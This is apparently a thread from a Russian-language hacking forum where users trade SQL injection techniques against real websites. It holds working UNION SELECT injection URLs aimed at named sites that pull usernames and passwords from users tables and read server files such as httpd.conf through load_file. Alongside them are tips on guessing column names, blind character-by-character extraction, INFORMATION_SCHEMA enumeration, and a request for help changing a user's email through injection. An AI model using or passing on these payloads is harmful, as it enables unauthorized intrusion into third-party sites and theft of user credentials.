http://www.curufc.com/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x05,id,username,password),0x72),0x72),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+users+limit+1,1/*
да скорее всего самописный какойто (оч похоже на base64, но это не просто base64 а что то еще, хотя хз), читай скрипты, ищи где это осуществляется: вот тебе httpd.conf Code: http://www.curufc.com/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(load_file('/usr/local/apache/conf/httpd.conf'),0x71),0x71),4,5,6,8,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/* вот тебе index.php Code: http://www.curufc.com/index.php?pageid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(load_file('/home/vhost/curufc.com/html/index.php'),0x71),0x71),4,5,6,8,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/* вобщем ковыряй, если это действительно нужно
Так, сюда вроде задают вопросы, вот и я задам, надеюсь не будет оффтопом. Нашел сайт. Делал Sql и получал вот такую страницу при запросе =1' Скрин номер раз Ну в принципе все стандартно, тока почему то на отдельной странице. Но если сделать кривой запрос, например: ='-1 то получаем вообще вот такое: скрин номер два Скажите что за баг, и можно ли его испльзовать? Есть ли полезность? Заранее спасибо...
2Twiddle обычная sql-inj, скорей всего можно исползовать, ну и значит определеннные даннные ты наверное сможешь получить
Скажите народ, вот если сайтик на одних html' ках построен, то есть без скриптов всяких, получается и зацепится не за что?
Ситуация такая: Имею эстонский сайт с инъектом, кол-во колонок подобрал, есть табличка users. Версия мускула 4.1.22. Трабла в том, что не могу подобрать столбцы в users. Ни один из ниже перечисленных не подходит. Code: id login user name nickname nick user_name password pass pwd pws User_password host Прошу, если кто-то сталкивался с такой проблемой подсказать. Быть может имена столбцов на национальном языке..
1. попробуй проверить или есть права на чтение файлов /load_file(_полный_путь_к_файлу_)/ если есть то всё таблицы, колонки можно вытянуть из скриптов. 2. это способ который помогает мне в 80% - просматриваешь исходники страницы и находишь что-то в этом роде "....<input type="password" name="pwd"/>....", значение параметра name, обычно, совпадает с именем столбца.
2 Zamut ентих вариантов стандартных, еще целая куча может быть, причем не на национальном языке, дай линк, попробую помочь а по-эстонски я знаю: login: Code: kasutaja kasutajanimi kasutajatunnus pass: Code: parool salasõna
2 big_BRAT спасибо, частично помогло) Теперь ситуация такая: имею большой ресурс, кол-во столбцов известно, (!ни один из них не выводится на экран!),есть табличка mysql.user в табличке есть столбцы user и password. Есть ли возможность, что-то достать ?
ога, ещё не забывай мыть руки перед едой Скажи мне чем конверт и аес помогут ему в случае отсутствия принтабельных полей?
Народ подскажите мне можно ли при помощи посимвольного перебора подбирать название таблиц и колонок , иначе я непойму нафиг он тогда нужен ? юзер() и так же выводиться, нафига в мануалах учат на таком примере. Просьба не предлагать юзать перл скрипты для брута таблиц, один хрен если попадеться таблица с именем qwaszx_admin_zxewq её не сбрутиш. Заранее сенкс 8)
Это называется blind-inj, т.е. если допустим у тебя нет возможности вывести на страницу (увидеть) данные, то тебе придется использовать такие вот подзапросы и подбирать данные посимвольно, иногда бывает не возможно использовать union select, в таком случае опять же помогает использование подзапросов (таких вот логических операций) , также это единственный способ использовать sql инъекцию после order by, да я понимаю долго и неудобно (хотя можно автоматизировать) но иногда (очень часто) это единственный способ получить данные из sql инъекции если версия мускула 5 ветки, то можно подбирать имена таблиц и колонок таким способом, но это опять же получение данных с помощью подзапроса из определенного столбца и определенной таблицы
Code: http://www.polimernm.ru/partner.php?pid=-1+union+select+1,pass,user(),6,5+from+login/* я в этом деле новичок для чего выкладывают [email protected] и что оно даёт? Что делать дальше? как узнать пароль\хеш админа? или юзверя какого нибудь?
Дальше надо прочитать хоть пару статей про sql-inj.... Смотрим таблицы,далее колонки....и будет тебе счастье) Code: http://www.polimernm.ru/partner.php?pid=-1+union+select+1,TABLE_NAME,3,4,5+from+INFORMATION_SCHEMA.TABLES+limit+1,1/*
2Extremal в твоем случае нет, это Mysql, при mysql-inj нельзя использовать две конструкции сразу, в MSSQL можно с помощью ; 2Mike 007 если такой запрос выдаст например [email protected], то сразу открываются большие перспективы при использовании sql-inj
Здравствуйте! Есть БД MySQL 5.0.27, уязвимая, кавычки использовать нельзя. Вид такой: Code: .php?id=100+union+select+null,email,null+from+users+where+regID=5/* Скажите, как к этой строке корректно добавить update+set или нечто подобное, чтобы у юзера с regID=5 изменить значение поля email? Спасибо!
